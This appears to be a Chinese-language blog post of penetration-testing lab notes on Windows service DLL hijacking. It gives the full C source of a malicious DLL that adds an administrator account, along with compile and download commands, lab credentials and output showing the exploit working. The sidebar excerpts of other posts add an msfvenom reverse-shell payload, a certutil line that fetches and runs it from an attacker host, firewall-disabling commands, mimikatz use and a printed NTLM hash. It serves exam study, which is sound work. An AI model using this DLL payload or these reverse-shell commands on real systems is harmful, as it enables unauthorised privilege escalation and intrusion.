Windows 服務 DLL 劫持

-

 Windows 服務 DLL 劫持


前一篇中替換服務的二進位檔案是嘗試在 Windows 系統上進行權限提升的非常有效的方法

但往往不是這麼順利,因為權限的問題,所以進一步可以透過引用的 dll 檔案來做為另外一種選擇,這個往往是比較容易的方式,因為如果每個誠史都要自己編譯與準備相關的函式庫,那整個檔案與系統將會過大,所以幾乎都是調用內建的 dll 函式庫,上一篇覆蓋的是執行的 *.exe 檔案,這一篇大同小異,只是替換的檔案改成調用的 dll 函式庫

目前 Windows 版本上的標準 DLL 搜尋順序如下

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory. 
5. The current directory.
6. The directories that are listed in the PATH environment variable.

所以一般利用的方式是可以嘗試將惡意 DLL(帶有丟失 DLL 的名稱)放置在 DLL 搜尋順序的路徑中,以便它在二進位執行檔啟動時執行。


靶機 : 192.168.227.220,已知使用者帳號密碼 steve / securityIsNotAnOption++++++

第一步 RDP 進去└─$ xfreerdp -v:192.168.227.220 -u:steve -p:securityIsNotAnOption++++++

一樣先列舉服務 Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
本次要利用的是 BetaService




一樣看一下該服務相關使用者權限,icacls .\Documents\BetaServ.exe,只有 (RX)

所以無法像前一篇一樣替換服務執行檔




我們的目標是識別 BetaService載入的所有 DLL並偵測遺失的 DLL。一旦我們獲得了服務二進位檔案使用的 DLL 列表,我們就可以檢查它們的權限以及它們是否可以被惡意 DLL 取代。或者,如果發現缺少 DLL,我們可以嘗試按照 DLL 搜尋順序提供我們自己的 DLL。

標準是把檔案 COPY 到另一台電腦然後啟動 Process Monitor 來監控他執行的 dll 檔案

這裡我們僅有一台機器所以直接調用另一個帳號 backupadmin / admin123admin123! 來啟用

啟動後 filter 該服務,不然資訊量會過多




重新啟動服務發現 myDLL.dll 找不到







編譯自己的 dll 檔案如下,一樣新增使用者再塞入管理者群組

=====================================================================

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user dave2 password123! /add");
  	    i = system ("net localgroup administrators dave2 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

=====================================================================



記得一樣要編譯後才有辦法使用

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

執行遇到問題可能是沒有安裝 gcc or g++,使用 sudo apt-get install gcc/g++ 安裝

或是 gcc 跟 g++ 版本不一致,可以用 gcc -v & g++ -v 確認一下

還是不行那就應該是 mingw32 的問題可以執行 sudo apt install mingw-w64 更新一下

因為有可能後面的套件影響到原有的套件,重新安裝一般都可以解決

一樣透過 iwr 傳送檔案過去,傳過去前記得先切換到使用者的 Documents 路徑

這是因為 dll 查找順序是在使用者的 directory 中,表示 Documents

iwr -uri http://192.168.45.228/myDLL.dll -Outfile myDLL.dll

並確認當前沒有 dave2 使用者

PS C:\Users\steve> cd Documents

PS C:\Users\steve\Documents> iwr -uri http://192.168.119.3/myDLL.dll -Outfile myDLL.dll

PS C:\Users\steve\Documents> net user
User accounts for \\CLIENTWK220

-------------------------------------------------------------------------------
Administrator            BackupAdmin              dave
daveadmin                DefaultAccount           Guest
offsec                   steve                    WDAGUtilityAccount
The command completed successfully.



重啟服務,再次查看使用者與管理者群組

PS C:\Users\steve\Documents> Restart-Service BetaService
WARNING: Waiting for service 'BetaService (BetaService)' to start...
WARNING: Waiting for service 'BetaService (BetaService)' to start...

PS C:\Users\steve\Documents> net user
User accounts for \\CLIENTWK220

-------------------------------------------------------------------------------
Administrator            BackupAdmin              dave
dave2                    daveadmin                DefaultAccount
Guest                    offsec                   steve
WDAGUtilityAccount
The command completed successfully.

PS C:\Users\steve\Documents> net localgroup administrators
...
Administrator
BackupAdmin
dave2
daveadmin
offsec
The command completed successfully.




留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

濫用 Windows 庫文件(Library File)

-
圖片
 濫用 Windows 庫文件(Library File) 首先在 Kali 上設置一個 WebDAV 共享,透過 pip3 先行安裝 指令 pip3 install wsgidav 建立一個路徑 /home/kali_r/webdav 目錄以用作包含 .link 文件的 WebDAV 共享 先在此路徑下建立一個 test.txt 文件 mkdir /home/kali_r/webdav & touch /home/kali_/webdav/test.txt 接下來將從 /home/kali_r/.local/bin 目錄運行 WsgiDAV。整個過程中使用 wsgidav 作為啟動服務器的命令。 提供的第一個參數是 --host,它指定要提供服務的主機 我們將監聽所有帶有 0.0.0.0 的接口 接下來使用 --port=80 指定偵聽端口,並使用 --auth=anonymous 禁用對共享的身份驗證 最後使用 --root /home/kali_r/webdav/ 設置為 WebDAV 共享目錄的根目錄 指令 └─$ /home/kali_r/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali_r/webdav/ netstat 一下可以看到已經有 listen 80 Port 用瀏覽器開啟測試,可以看到前面建立的 test.txt 接著使用 xfreerdp 登入到某台 windows  帳號 : offsec、密碼 : lab、掛載本機的 /home/kali_r 為遠端的網路磁碟機 aries └─$ xfreerdp -v:192.168.203.194 -u:offsec -p:lab -drive:aries,/home/kali_r 使用該台機器已安裝的 Visual Studio Code 來進行編輯接下來要用的攻擊檔案 建立一個新的文字檔 建立如下內容檔案 下面的列表包含庫文件的命名空間 。這是從 Windows 7 開始的庫文件格式版本的命名空間。該列表還包含庫描述的結束標記。涵蓋的以下所有標籤都將添加到 libraryDescription 標籤內。 <?xml version="1...
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容